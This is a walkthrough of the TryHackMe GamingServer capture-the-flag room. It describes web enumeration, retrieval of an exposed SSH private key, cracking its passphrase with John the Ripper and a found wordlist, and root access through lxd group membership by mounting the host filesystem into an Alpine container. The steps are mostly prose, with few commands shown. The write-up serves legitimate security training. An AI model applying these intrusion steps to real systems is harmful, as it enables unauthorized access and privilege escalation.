Tryhackme-GmingServer Walkthrough
Vrijanandan Kumar
Cyber Security Enthusiast || CTF Player || Security Researchers || Passionate about Securing the Digital World || CEH
Network Enumeration
I started the network enumeration by running a port scan using rustscan looking for open ports and running services.
We have only two open ports: SSH on port 22 and the Apache HTTP server on port 80. Let's begin our enumeration by focusing on port 80.
Web Enumeration
When we visit the IP address in our web browser, the website displays default lorem ipsum text. Let's check the source code of this site.
We get a potential username john. Next we can run a gobuster scan to look for hidden files and directories.
The gobuster scan gives us so many files. Let's check them one by one
In the /secret directory, we have a file named secretKey which contains a private key. We have SSH installed on the target machine. This could be the private SSH key of user john.
I tried logging in via SSH but the private key is password protected.
We also have a /uploads which contains some interesting files.
We also have a "The Hacker Manifesto" which looks pretty neat!
We've also found a file named dict.lst which appears to be a wordlist. Let's download it to our system. We can utilize this wordlist to attempt to crack the private key!
领英推荐
User Shell
We can use John the Ripper tool to crack the password for the private key of user john.
We need to convert the secretKey into a format that John can understand.We will be using ssh2john.py for this.
I'll save the output in hash.txt and then we can crack the password with the wordlist we found using John the Ripper.
We've successfully obtained the password for the private key. With this, we can now SSH into the target system and access the user flag
Root Shell
Now that we have a shell as user john, our next objective is to find a method to elevate our privileges to root.
If we use the id command, we can see that the user john is a part of the lxd group.
id
LXD is a lightweight container hypervisor which allows to run linux containers. If a member is part of the lxd group, it can escalate its privileges to user root irrespective of the fact that it has sudo permissions or not.
I found this guide related to lxd privilege escalation. We need to build an alpine image and then we can mount the /root directory of ?the target machine to the /mnt directory of a lxd container.
First we need to build the image in our own machine:
wget https://github.com/saghul/lxd-alpine-builder.git
This will create a .tar.gz compressed image similar to this:
Next we need to copy the compressed file to the target machine and then import the image using lxc.
Our container has been created. Now we can simply start the container and read our final flag in the /mnt/root/root directory!